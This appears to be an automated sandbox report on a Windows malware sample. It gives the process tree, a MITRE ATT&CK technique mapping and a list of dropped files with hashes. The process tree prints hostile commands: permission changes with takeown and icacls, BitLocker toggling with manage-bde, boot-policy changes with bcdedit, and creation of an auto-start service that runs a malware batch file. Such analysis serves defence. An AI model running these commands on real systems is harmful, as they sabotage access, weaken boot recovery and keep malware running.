C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:5700

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user "FZBXDXUA$"
2⤵
PID:5988

C:\Windows\system32\net.exe
net user "FZBXDXUA$"
3⤵
PID:5328

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6076

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6072

C:\Windows\system32\manage-bde.exe
manage-bde -off C:
2⤵
PID:5636

C:\Windows\system32\manage-bde.exe
manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
2⤵
PID:5832

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled yes
2⤵
- Modifies boot configuration data using bcdedit
PID:4232

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
- Modifies boot configuration data using bcdedit
PID:6080

C:\Windows\system32\sc.exe
sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
2⤵
- Launches sc.exe
PID:5580

C:\Windows\system32\net.exe
net start MiServicio
2⤵
PID:6036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start MiServicio
3⤵
PID:5564

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5588

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6080

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5264

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:5576

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5848

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

File and Directory Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
4f7152bc5a1a715ef481e37d1c791959

SHA1
c8a1ed674c62ae4f45519f90a8cc5a81eff3a6d7

SHA256
704dd4f98d8ca34ec421f23ba1891b178c23c14b3301e4655efc5c02d356c2bc

SHA512
2e6b02ca35d76a655a17a5f3e9dbd8d7517c7dae24f0095c7350eb9e7bdf9e1256a7009aa8878f96c89d1ea4fe5323a41f72b8c551806dda62880d7ff231ff5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
ea98e583ad99df195d29aa066204ab56

SHA1
f89398664af0179641aa0138b337097b617cb2db

SHA256
a7abb51435909fa2d75c6f2ff5c69a93d4a0ab276ed579e7d8733b2a63ffbee6

SHA512
e109be3466e653e5d310b3e402e1626298b09205d223722a82344dd78504f3c33e1e24e8402a02f38cd2c9c50d96a303ce4846bea5a583423937ab018cd5782f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
96B

MD5
7c0df6294b55b6b8080f767d7f5767f7

SHA1
1c9e4619ec787ceb528db5cb281bce3e3dd61252

SHA256
6de3c7829033dec610557e71877a579f5cea2f803d49eb732b8b9071026035c0

SHA512
66e54840862f0dcf96e4665eae60a20d08ab892d5a7bf9c6f2097dd080d5efd9a81300d9a26a85ab0cf6b2be20962b59cff71cdb603265bf06db6993f52ae294

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
d31ccda0502729c0f96231e5d4b9d65c

SHA1
0e6f08af5b101893a5e0b8a8d362fb441b0040a1

SHA256
2039efb6072cb7cbe2a32e101b3091cc57f4185911f0262e6f4c0f4d2e1494d7

SHA512
8f7fc375a8eae648a4bedde494a728f9ce9ada23d6a4dc8c361f3ff8e8e095005bd91948dc44c38042438c7f88d0e3fc9d75d5a4d3d75b71ac7cf2b3c383c9d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
4a629e54898a161d9457e859782bc33b

SHA1
edfc1d1a64b8afb3414280f2da53a235be703d1c

SHA256
ca05dd8dcab2a74292cad2a04adc84256c9725854eba6936e55c2419d9b8dab0

SHA512
adf07feec01d3ef60f4807a2ba8ba96a9f4f8ffafbce4ca0964245ce59c6350f74590e96474ad33fcabcbdaa613373ca15a4a2440f86f74c43a9d916d4dfd1f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
30ad785b71f0aa3af2f0c51d5f98dd9d

SHA1
db47869f74b93e60936b8f83b3e280643bb5257e

SHA256
6822c0a82743d54ce0b373a1dc238f7e1a6f000257d9375c9dc10254c22b6372

SHA512
abe167b4dbf2340048673c2bc68dfae373ee6a53eae97b931cb2d8d4f0c0fa61dda8b1a32c667033ce3a742a9ba37a6209d3cb43942fec0924df030ab4e8abb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
3f21b841f2072334be968e8a00a947df

SHA1
3ad11962ebd89036fe53992f50888f36b1d5d429

SHA256
f52d46db6f650083463f3718dd0e37bcb0b3b180a35093ffce1829c34ed7dbcf

SHA512
65ec25508077426c303895c53574030bb201095eaf13ed01b146ba8e4169c5d57fd98a03fdf02347f966a8e28bc6c4f9b4f249316d6fd8edd18ef077cdbbdfce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
20a446ac65dc41fc00a35876bc78092b

SHA1
d932f3796b19edc46f04babfe1ea1aa221fe1e5a

SHA256
a76d986ca89b33941d564b107dcd6f33e03e2ede981d26d361e5e861e1cadc50

SHA512
7836f9123171899dccb6d9c58552de63cc3a7182ad5ed7165bbcf306c88e01963081b0b2c99d3741f94898f9f8aee6174164462ab98be22dbdbe2596952db6fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
a842a9ba21eb7c18d5ddd2995c838320

SHA1
87a6160e52486e622132d1a19ffd146173b5db59

SHA256
69ed109191e7e9617b93ce785412c0802a269ff3dc8ac5b23efae43e14edd2de

SHA512
07d1a70eef8ce7112a861ea5b11a2708c58516f59330259a9ec9122c332b85f329d63f354a0c539cd0d4260aa47557fba29498a8cab40c29812616b9f8b3951e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
aa8efa56e1e40374bbd21e0e469dceb7

SHA1
33a592799d4898c6efdd29e132f2f76ec51dbc08

SHA256
25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf

SHA512
ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bpu3xaqx.2so.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\disable_winload.reg
Filesize
91B

MD5
47b5ae368c4aff20eafa90ffdcd03a34

SHA1
dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81

SHA256
aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07

SHA512
c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db
Filesize
1024KB

MD5
94194e2fa69ff276dc002efb0f8abcb6

SHA1
701f2598e03e52079e6cdc7447b0599074cd0b16

SHA256
b7c138f85c20298bdffca80a05ce874ee1456093b003a88c839031f2f21549cc

SHA512
ee89547299c1c9b0bc9288872cde385ebe60195444644551290a660bc7471802b7ace97565bfcde6d525e84aed05727855ef49b97c27d38403490a4ca4f677a5

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
7KB

MD5
83d0f9f348182309763ee1ccf371bfc6

SHA1
1bdeab33c57933dcdc7aeebde33daf840278a43f

SHA256
4ec103ac2a883e56fa40b536de331ddf1431a3937e7aa54b2b1cbc3c912e16f6

SHA512
7a06900f29fbde70dde1105a538ec60d5aca4cccaa70e55880365615daf8a4eb5d7e51abe6a96a45103bd8f86aafe9044eada9732095b04d6e873d83fabd597d

Download Submit
\??\pipe\LOCAL\crashpad_2236_BVVCPOGJSIEWSPNF
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/6072-78-0x000001F97F7B0000-0x000001F97F7D2000-memory.dmp

Filesize
136KB

Download